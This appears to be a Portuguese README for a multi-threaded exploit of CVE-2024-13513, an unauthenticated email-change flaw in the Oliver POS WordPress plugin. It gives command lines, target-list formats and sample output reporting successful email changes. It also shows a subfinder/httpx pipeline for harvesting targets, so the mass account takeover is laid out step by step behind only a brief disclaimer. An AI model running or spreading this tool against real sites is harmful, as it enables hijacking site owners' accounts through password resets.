
Exploit multi-thread para CVE-2024-13513 visando alteração de e-mail não autenticada no plugin Oliver POS. Escaneia listas de URLs, detecta versões vulneráveis e realiza exploração com registro de saída.
Uso
Uso Básico
bash
python3 exploit.py -l targets.txt -e [email protected]
Uso Avançado
bash
python3 exploit.py
-l targets.txt
-e [email protected]
-t 100
-o /path/to/results
Explicação dos Parâmetros
| Parâmetro | Descrição | Obrigatório | Padrão |
|---|---|---|---|
| -l, --list | Caminho para o arquivo contendo URLs alvo | ✅ Sim | - |
| -e, --email | Endereço de e-mail para redefinição de senha | ✅ Sim | - |
| -t, --threads | Número de threads simultâneas | ❌ Não | 50 |
| -o, --output | Diretório de saída para resultados | ❌ Não | Diretório atual |
| Formato do Arquivo de Entrada | |||
| Crie um arquivo de texto (targets.txt) com uma URL por linha: |
text example.com https://site1.com http://site2.com http://192.168.1.100/wordpress https://vulnerable-site.org/blog Arquivos de Saída A ferramenta gera vários arquivos de saída:
Exemplo de Execução bash python3 exploit.py -l my_targets.txt -e [email protected] -t 80
[ INFO ] Loaded 150 unique targets [ INFO ] Using email: [email protected] [ INFO ] Threads: 80 [ INFO ] Starting scan...
[ CHECKING ] http://example.com/ [ VULNERABLE ] http://example.com/ [ SUCCESS ] Email changed successfully: http://example.com/ [ NOT FOUND ] http://site2.com/ [ PATCHED ] http://site3.com/
[ INFO ] Execution time: 45.23 seconds Exemplos Avançados Varredura Rápida com Alto Número de Threads bash python3 exploit.py -l urls.txt -e [email protected] -t 200 Salvar Resultados em Diretório Específico bash python3 exploit.py -l targets.txt -e [email protected] -o ./scan_results Combinar com Outras Ferramentas bash
subfinder -d example.com | httpx -silent | tee targets.txt python3 exploit.py -l targets.txt -e [email protected] -t 100 Notas Importantes Aviso Legal ⚠️ Esta ferramenta é apenas para fins educacionais e de teste de penetração autorizado.
Detalhes Técnicos
Dicas de Desempenho
Solução de Problemas Problemas Comuns:
bash
[ ERROR ] File not found: targets.txt
[ ERROR ] Invalid email format
[ CONN ERROR ] example.com [ TIMEOUT ] example.com Soluções:
Interpretação da Saída
Esta ferramenta fornece capacidades abrangentes de varredura e exploração para profissionais de segurança que realizam avaliações de vulnerabilidade autorizadas.